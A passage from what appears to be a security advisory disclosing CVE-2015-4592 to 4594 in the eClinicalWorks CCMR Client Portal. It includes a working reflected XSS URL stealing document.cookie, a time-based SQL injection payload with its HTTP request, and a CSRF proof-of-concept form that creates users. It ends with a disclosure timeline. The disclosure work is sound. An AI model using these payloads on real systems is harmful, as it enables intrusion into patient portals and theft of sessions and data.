users to inject \narbitrary javascript via the strMessage parameter. \n \nhttps://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/login.jsp?strMessage= \n%3Cimg%20src=/%20onerror=%22alert%28document.cookie%29%22/%3E \n \n------------------------------------- \n \n# CVE-2015-4592 SQL INJECTION \nSQL injection vulnerability in portalUserService.jsp in eClinicalWorks Population \nHealth (CCMR) Client Portal Software allows remote authenticated users to inject \narbitrary malicious database commands as part of user input. \n \nParameter: uemail (POST PARAMETER) \nType: stacked queries \nTitle: Microsoft SQL Server/Sybase stacked queries (comment) \nPayload: action=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate= \n&zipcode=&uemail=john.doe@test.com';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno= \n \nPOST /mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp HTTP/1.1 \nHost: 127.0.0.1:443 \nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0 \nAccept: application/json, text/javascript, */*; q=0.01 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nContent-Type: application/x-www-form-urlencoded \nX-Requested-With: XMLHttpRequest \nReferer: https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/dashBoard.jsp \nContent-Length: 186 \n[SNIP] ... \nConnection: keep-alive \nPragma: no-cache \nCache-Control: no-cache \n[SNIP] ... \n \naction=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate= \n&zipcode=&uemail=john.doe@test.com';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno= \n \n------------------------------------- \n \n# CVE-2015-4593 CROSS-SITE REQUEST FORGERY \nCross-site request forgery (CSRF) vulnerability in portalUserService.jsp in eClinicalWorks \nClient Portal allows remote attackers to hijack the authentication of content administrators \nfor requests that could lead to the creation, modification and deletion of users, appointments \nand employees. 
\n \n# ADDING OF USER \n<html> \n<body> \n<form action=\"https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp\" method=\"POST\"> \n<input type=\"hidden\" name=\"action\" value=\"add\" /> \n<input type=\"hidden\" name=\"uid\" value=\"0\" /> \n<input type=\"hidden\" name=\"createdOver\" value=\"1\" /> \n<input type=\"hidden\" name=\"ufname\" value=\"John\" /> \n<input type=\"hidden\" name=\"ulname\" value=\"Doe\" /> \n<input type=\"hidden\" name=\"uminitial\" value=\"\" /> \n<input type=\"hidden\" name=\"selUserType\" value=\"1\" /> \n<input type=\"hidden\" name=\"status\" value=\"0\" /> \n<input type=\"hidden\" name=\"upaddress\" value=\"\" /> \n<input type=\"hidden\" name=\"upcity\" value=\"\" /> \n<input type=\"hidden\" name=\"upstate\" value=\"\" /> \n<input type=\"hidden\" name=\"zipcode\" value=\"\" /> \n<input type=\"hidden\" name=\"uemail\" value=\"johndoe@test.com.de\" /> \n<input type=\"hidden\" name=\"upphone\" value=\"98999299\" /> \n<input type=\"hidden\" name=\"umobileno\" value=\"\" /> \n<input type=\"submit\" value=\"Submit request\" /> \n</form> \n</body> \n</html> \n \n------------------------------------- \n \n# CVE-2015-4594 SESSION FIXATION \nThe web application is vulnerable to session fixation attacks. When authenticating a user \nthe application does not assign a new session ID, making it possible to use an existent \nsession ID. 
\n \n------------------------------------- \n \n# TIMELINE \n\u2013 16/06/2015: Vulnerability found \n\u2013 16/06/2015: Vendor informed \n\u2013 16/06/2015: Request for CVE IDs \n- 16/06/2015: MITRE issued CVE numbers \n\u2013 16/06/2015: Vendor responded requesting more information on support contract etc \n- 21/06/2015: No support contract, vendor does not open case \n- 22/06/2015: Requested update from vendor, no response \n- 01/07/2015: Contacted vendor again, vendor requested for support contract again \n- 02/07/2015: No support contract, no response from vendor \n\u2013 31/01/2016: Public disclosure \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/135533/eclinicalworks-sqlxssxsrfsf.txt", "cvss": {"score": 0.0, "vector": "NONE"}}]}